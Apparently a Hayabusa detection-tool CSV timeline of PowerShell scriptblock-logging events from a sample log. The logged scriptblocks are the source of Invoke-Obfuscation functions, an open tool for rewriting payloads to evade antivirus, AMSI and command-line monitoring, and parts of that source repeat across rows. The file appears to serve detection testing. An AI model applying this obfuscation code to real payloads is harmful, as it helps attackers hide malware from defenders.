.LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken[]] $Tokens, [Parameter(Position = 2, Mandatory = $True)] [ValidateNotNullOrEmpty()] [Int] $Index, [Parameter(Position = 3, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) $Token = $Tokens[$Index] # The Parameter Attributes in $MemberTokensToOnlyRandomCase (defined at beginning of script) cannot be obfuscated like other Member Tokens # For these tokens we will only randomize the case and then return as is. # Source: https://social.technet.microsoft.com/wiki/contents/articles/15994.powershell-advanced-function-parameter-attributes.aspx If($MemberTokensToOnlyRandomCase -Contains $Token.Content.ToLower()) { $ObfuscatedToken = Out-RandomCase $Token.Content $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } # If $Token immediately follows a . or :: (and does not begin $ScriptString) of if followed by [] type cast within # parentheses then only allow Member token to be obfuscated with ticks and quotes. # The exception to this is when the $Token is immediately followed by an opening parenthese, like in .DownloadString( # E.g. both InvokeCommand and InvokeScript in $ExecutionContext.InvokeCommand.InvokeScript # E.g. If $Token is 'Invoke' then concatenating it and then adding .Invoke() would be redundant. $RemainingSubString = 50 If($RemainingSubString -gt $ScriptString.SubString($Token.Start+$Token.Length).Length) { $RemainingSubString = $ScriptString.SubString($Token.Start+$Token.Length).Length } # Parse out $SubSubString to make next If block a little cleaner for handling fringe cases in which we will revert to ticks instead of concatenation or reordering of the Member token value. 
$SubSubString = $ScriptString.SubString($Token.Start+$Token.Length,$RemainingSubString) If(($Token.Content.ToLower() -eq 'invoke') ` -OR (((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) ` -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) ` -AND (($ScriptString.Length -ge $Token.Start+$Token.Length+1) -AND (($SubSubString.SubString(0,1) -ne '(') -OR (($SubSubString.Contains('[')) -AND !($SubSubString.SubString(0,$SubSubString.IndexOf('[')).Contains(')'))))))) { # We will use the scriptString length prior to obfuscating 'invoke' to help extract the this token after obfuscation so we can add quotes before re-inserting it. $PrevLength = $ScriptString.Length # Obfuscate 'invoke' token with ticks. $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token #$TokenLength = 'invoke'.Length + ($ScriptString.Length - $PrevLength) $TokenLength = $Token.Length + ($ScriptString.Length - $PrevLength) # Encapsulate obfuscated and extracted token with double quotes if it is not already. $ObfuscatedTokenExtracted = $ScriptString.SubString($Token.Start,$TokenLength) If($ObfuscatedTokenExtracted.StartsWith('""') -AND $ObfuscatedTokenExtracted.EndsWith('""')) { $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedTokenExtracted + $ScriptString.SubString($Token.Start+$TokenLength) } Else { $ScriptString = $ScriptString.SubString(0,$Token.Start) + '""' + $ObfuscatedTokenExtracted + '""' + $ScriptString.SubString($Token.Start+$TokenLength) } Return $ScriptString } # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # Convert $Token to character array for easier manipulation. 
$TokenArray = [Char[]]$TokenContent # Randomly upper- and lower-case characters in current token. $TokenArray = Out-RandomCase $TokenArray # User input $ObfuscationLevel (1-2) will choose between concatenating Member token value string or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Member Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses -- .Trim does this unevenly. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Retain current token before re-tokenizing if 'invoke' member was introduced (see next For loop below) $InvokeToken = $Token # Retain how much the token has increased during obfuscation process so far. $TokenLengthIncrease = $ObfuscatedToken.Length - $Token.Content.Length # Add .Invoke if Member token was originally immediately followed by '(' If(($Index -lt $Tokens.Count) -AND ($Tokens[$Index+1].Content -eq '(') -AND ($Tokens[$Index+1].Type -eq 'GroupStart')) { $ObfuscatedToken = $ObfuscatedToken + '.Invoke' } # Add the obfuscated token back to $ScriptString. 
$ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedCommandArgumentTokenLevel3 { <# .SYNOPSIS Obfuscates command argument token by randomly concatenating the command argument as a string and encapsulating it with parentheses. Invoke-Obfuscation Function: Out-ObfuscatedCommandArgumentTokenLevel3 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedCommandArgumentTokenLevel3 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Argument token value. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 1} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor ('Gr'+'een'); Write-Host 'Obfuscation Rocks!' 
-ForegroundColor (""Gree""+""n"") C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedCommandArgumentTokenLevel3 $ScriptString $Token 2} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor (""{1}{0}""-f 'een','Gr'); Write-Host 'Obfuscation Rocks!' -ForegroundColor (""{0}{1}"" -f 'Gre','en') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 'CommandArgument' 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # Function name declarations are CommandArgument tokens that cannot be obfuscated with concatenations. # For these we will obfuscated them with ticks because this changes the string from AMSI's perspective but not the final functionality. 
If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function')) #If($ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('function') -or $ScriptString.SubString(0,$Token.Start-1).Trim().ToLower().EndsWith('filter')) { $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token Return $ScriptString } # Set $Token.Content in a separate variable so it can be modified since Content is a ReadOnly property of $Token. $TokenContent = $Token.Content # If ticks are already present in current Token then remove so they will not interfere with string concatenation. If($TokenContent.Contains('`')) {$TokenContent = $TokenContent.Replace('`','')} # User input $ObfuscationLevel (1-2) will choose between concatenating CommandArgument token value string or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce a Type token unnecessarily ([Regex]). Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLev",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"el value ($ObfuscationLevel) was passed to switch block for Argument Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses -- .Trim does this unevenly. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Add the obfuscated token back to $ScriptString. 
$ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedTypeToken { <# .SYNOPSIS Obfuscates type token by using direct type cast syntax and concatenating or reordering the Type token value. This function only applies to Type tokens immediately followed by . or :: operators and then a Member token. E.g. [Char][Int]'123' will not be obfuscated by this function, but [Console]::WriteLine will be obfuscated. Invoke-Obfuscation Function: Out-ObfuscatedTypeToken Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedTypeToken obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Type token value. 
.EXAMPLE C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Type'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 1} C:\PS> $ScriptString sET EOU ( [TYPe]('CO'+'NS'+'oLe')) ; ( CHILdiTEM VariablE:EOU ).VALUE::WriteLine('Hello World!'); $eoU::WriteLine('Obfuscation Rocks!') C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Type'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 2} C:\PS> $ScriptString SET-vAriablE BVgz6n ([tYpe](""{2}{1}{0}"" -f'sOle','On','C') ) ; $BVGz6N::WriteLine('Hello World!'); ( cHilDItem vAriAbLE:bVGZ6n ).VAlue::WriteLine('Obfuscation Rocks!') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Type' 1 C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Type' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # If we are dealing with a Type that is found in $TypesThatCannotByDirectTypeCasted then return as is since it will error if we try to direct Type cast. ForEach($Type in $TypesThatCannotByDirectTypeCasted) { If($Token.Content.ToLower().Contains($Type)) { Return $ScriptString } } # If we are dealing with a Type that is NOT immediately followed by a Member token (denoted by . or :: operators) then we won't obfuscated. # This is for Type tokens like: [Char][Int]'123' etc. If(($ScriptString.SubString($Token.Start+$Script:TypeTokenScriptStringGrowth+$Token.Length,1) -ne '.') -AND ($ScriptString.SubString($Token.Start+$Script:TypeTokenScriptStringGrowth+$Token.Length,2) -ne '::')) { Return $ScriptString } # This variable will be used to track the growth in length of $ScriptString since we'll be appending variable creation at the beginning of $ScriptString. # This will allow us to avoid tokenizing $ScriptString for every single Type token that is present. $PrevLength = $ScriptString.Length # See if we've already set another instance of this same Type token previously in this obfsucation iteration. $RandomVarName = $NULL $UsingPreviouslyDefinedVarName = $FALSE ForEach($DefinedTokenVariable in $Script:TypeTokenVariableArray) { If($Token.Content.ToLower() -eq $DefinedTokenVariable[0]) { $RandomVarName = $DefinedTokenVariable[1] $UsingPreviouslyDefinedVarName = $TRUE } } # If we haven't already defined a random variable for this Token type then we will do that. Otherwise we will use the previously-defined variable. 
If(!($UsingPreviouslyDefinedVarName)) { # User input $ObfuscationLevel (1-2) will choose between concatenating Type token value string (after trimming square brackets) or reordering it with the -F format operator. # I am leaving out Out-ObfuscatedStringCommand's option 3 since that may introduce another Type token unnecessarily ([Regex]). # Trim of encapsulating square brackets before obfuscating the string value of the Type token. $TokenContent = $Token.Content.Trim('[]') Switch($ObfuscationLevel) { 1 {$ObfuscatedToken = Out-StringDelimitedAndConcatenated $TokenContent -PassThru} 2 {$ObfuscatedToken = Out-StringDelimitedConcatenatedAndReordered $TokenContent -PassThru} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for Type Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Add syntax for direct type casting. $ObfuscatedTokenTypeCast = '[type]' + '(' + $ObfuscatedToken + ')' # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. 
While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Track this variable name and Type token so we can reuse this variable name for future uses of this same Type token in this obfuscation iteration. $Script:TypeTokenVariableArray += , @($Token.Content,$RandomVarName) } # Randomly decide if the variable name will be concatenated inline or not. # Handle both and syntaxes depending on which option is chosen concerning GET variable syntax. $RandomVarNameMaybeConcatenated = $RandomVarName $RandomVarNameMaybeConcatenatedWithVariablePrepended = 'variable:' + $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName (Get-Random -Input @('""',""'""))) + ')' $RandomVarNameMaybeConcatenatedWithVariablePrepended = '(' + (Out-ConcatenatedString ""variable:$RandomVarName"" (Get-Random -Input @('""',""'""))) + ')' } # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast + ' '*(Get-Random @(0..2)) + ')' $RandomVarSetSyntax += 'Set-Item' + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $ObfuscatedTokenTypeCast + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarSet = Out-RandomCase $RandomVarSet # Generate random variable GET syntax. 
$RandomVarGetSyntax = @() $RandomVarGetSyntax += '$' + $RandomVarName $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('Get-Variable','Variable')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + (Get-Random -Input ((' '*(Get-Random @(0..2)) + ').Value'),(' '*(Get-Random @(1..2)) + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ' '*(Get-Random @(0..2)) + ')'))) $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(0..2)) + ').Value' # Randomly choose from above variable syntaxes. $RandomVarGet = (Get-Random -Input $RandomVarGetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarGet = Out-RandomCase $RandomVarGet # If we're using an existing variable already set in ScriptString for the current Type token then we don't need to prepend an additional SET variable syntax. $PortionToPrependToScriptString = '' If(!($UsingPreviouslyDefinedVarName)) { $PortionToPrependToScriptString = ' '*(Get-Random @(0..2)) + $RandomVarSet + ' '*(Get-Random @(0..2)) + ';' + ' '*(Get-Random @(0..2)) } # Add the obfuscated token back to $ScriptString. $ScriptString = $PortionToPrependToScriptString + $ScriptString.SubString(0,$Token.Start+$Script:TypeTokenScriptStringGrowth) + ' '*(Get-Random @(1..2)) + $RandomVarGet + $ScriptString.SubString($Token.Start+$Token.Length+$Script:TypeTokenScriptStringGrowth) # Keep track how much $ScriptString grows for each Type token obfuscation iteration. $Script:TypeTokenScriptStringGrowth = $Script:TypeTokenScriptStringGrowth + $PortionToPrependToScriptString.Length Return $ScriptString } Function Out-ObfuscatedVariableTokenLevel1 { <# .SYNOPSIS Obfuscates variable token by randomizing its case, randomly adding ticks and wrapping it in curly braces. 
Invoke-Obfuscation Function: Out-ObfuscatedVariableTokenLevel1 Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-ObfuscatedVariableTokenLevel1 obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""`$Message1 = 'Hello World!'; Write-Host `$Message1 -ForegroundColor Green; `$Message2 = 'Obfuscation Rocks!'; Write-Host `$Message2 -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Variable'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedVariableTokenLevel1 $ScriptString $Token} C:\PS> $ScriptString ${m`e`ssAge1} = 'Hello World!'; Write-Host ${MEss`Ag`e1} -ForegroundColor Green; ${meSsAg`e`2} = 'Obfuscation Rocks!'; Write-Host ${M`es`SagE2} -ForegroundColor Green .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. 
C:\PS> Out-ObfuscatedTokenCommand {$Message1 = 'Hello World!'; Write-Host $Message1 -ForegroundColor Green; $Message2 = 'Obfuscation Rocks!'; Write-Host $Message2 -ForegroundColor Green} 'Variable' 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token ) # Return as-is if the variable is already encapsulated with ${}. Otherwise you will get errors if you have something like ${var} turned into ${${var}} If($ScriptString.SubString($Token.Start,2) -eq '${') { Return $ScriptString } # Length of pre-obfuscated ScriptString will be important in extracting out the obfuscated token before we add curly braces. $PrevLength = $ScriptString.Length $ScriptString = Out-ObfuscatedWithTicks $ScriptString $Token # Pull out ObfuscatedToken from ScriptString and add curly braces around obfuscated variable token. $ObfuscatedToken = $ScriptString.SubString($Token.Start,$Token.Length+($ScriptString.Length-$PrevLength)) $ObfuscatedToken = '${' + $ObfuscatedToken.Trim('""') + '}' # Add the obfuscated token back to $ScriptString. $ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length+($ScriptString.Length-$PrevLength)) Return $ScriptString } Function Out-RandomCaseToken { <# .SYNOPSIS HELPER FUNCTION :: Obfuscates any token by randomizing its case and reinserting it into the ScriptString input variable. 
Invoke-Obfuscation Function: Out-RandomCaseToken Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-RandomCaseToken obfuscates given input as a helper function to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .EXAMPLE C:\PS> $ScriptString = ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'CommandArgument'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-RandomCaseToken $ScriptString $Token} C:\PS> $ScriptString Write-Host 'Hello World!' -ForegroundColor GREeN; Write-Host 'Obfuscatio",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.243 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"el value ($ObfuscationLevel) was passed to switch block for Argument Token Obfuscation.""; Exit} } # Evenly trim leading/trailing parentheses -- .Trim does this unevenly. While($ObfuscatedToken.StartsWith('(') -AND $ObfuscatedToken.EndsWith(')')) { $ObfuscatedToken = ($ObfuscatedToken.SubString(1,$ObfuscatedToken.Length-2)).Trim() } # Encapsulate $ObfuscatedToken with parentheses. $ObfuscatedToken = '(' + $ObfuscatedToken + ')' # Add the obfuscated token back to $ScriptString. 
$ScriptString = $ScriptString.SubString(0,$Token.Start) + $ObfuscatedToken + $ScriptString.SubString($Token.Start+$Token.Length) Return $ScriptString } Function Out-ObfuscatedTypeToken { <# .SYNOPSIS Obfuscates type token by using direct type cast syntax and concatenating or reordering the Type token value. This function only applies to Type tokens immediately followed by . or :: operators and then a Member token. E.g. [Char][Int]'123' will not be obfuscated by this function, but [Console]::WriteLine will be obfuscated. Invoke-Obfuscation Function: Out-ObfuscatedTypeToken Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated, Out-StringDelimitedConcatenatedAndReordered (both located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-ObfuscatedTypeToken obfuscates a given token and places it back into the provided PowerShell script to evade detection by simple IOCs and process execution monitoring relying solely on command-line arguments. For the most complete obfuscation all tokens in a given PowerShell script or script block (cast as a string object) should be obfuscated via the corresponding obfuscation functions and desired obfuscation levels in Out-ObfuscatedTokenCommand.ps1. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER Token Specifies the token to obfuscate. .PARAMETER ObfuscationLevel Specifies whether to 1) Concatenate or 2) Reorder the Type token value. 
.EXAMPLE C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Type'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 1} C:\PS> $ScriptString sET EOU ( [TYPe]('CO'+'NS'+'oLe')) ; ( CHILdiTEM VariablE:EOU ).VALUE::WriteLine('Hello World!'); $eoU::WriteLine('Obfuscation Rocks!') C:\PS> $ScriptString = ""[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')"" C:\PS> $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) | Where-Object {$_.Type -eq 'Type'} C:\PS> For($i=$Tokens.Count-1; $i -ge 0; $i--) {$Token = $Tokens[$i]; $ScriptString = Out-ObfuscatedTypeToken $ScriptString $Token 2} C:\PS> $ScriptString SET-vAriablE BVgz6n ([tYpe](""{2}{1}{0}"" -f'sOle','On','C') ) ; $BVGz6N::WriteLine('Hello World!'); ( cHilDItem vAriAbLE:bVGZ6n ).VAlue::WriteLine('Obfuscation Rocks!') .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedTokenCommand function with the corresponding token type and obfuscation level since Out-ObfuscatedTokenCommand will handle token parsing, reverse iterating and passing tokens into this current function. C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Type' 1 C:\PS> Out-ObfuscatedTokenCommand {[console]::WriteLine('Hello World!'); [console]::WriteLine('Obfuscation Rocks!')} 'Type' 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Parameter(Position = 1, Mandatory = $True)] [ValidateNotNullOrEmpty()] [System.Management.Automation.PSToken] $Token, [Parameter(Position = 2, Mandatory = $True)] [ValidateSet(1, 2)] [Int] $ObfuscationLevel ) # If we are dealing with a Type that is found in $TypesThatCannotByDirectTypeCasted then return as is since it will error if we try to direct Type cast. ForEach($Type in $TypesThatCannotByDirectTypeCasted) { If($Token.Content.ToLower().Contains($Type)) { Return $ScriptString } } # If we are dealing with a Type that is NOT immediately followed by a Member token (denoted by . or :: operators) then we won't obfuscated. # This is for Type tokens like: [Char][Int]'123' etc. If(($ScriptString.SubString($Token.Start+$Script:TypeTokenScriptStringGrowth+$Token.Length,1) -ne '.') -AND ($ScriptString.SubString($Token.Start+$Script:TypeTokenScriptStringGrowth+$Token.Length,2) -ne '::')) { Return $ScriptString } # This variable will be used to track the growth in length of $ScriptString since we'll be appending variable creation at the beginning of $ScriptString. # This will allow us to avoid tokenizing $ScriptString for every single Type token that is present. $PrevLength = $ScriptString.Length # See if we've already set another instance of this same Type token previously in this obfsucation iteration. $RandomVarName = $NULL $UsingPreviouslyDefinedVarName = $FALSE 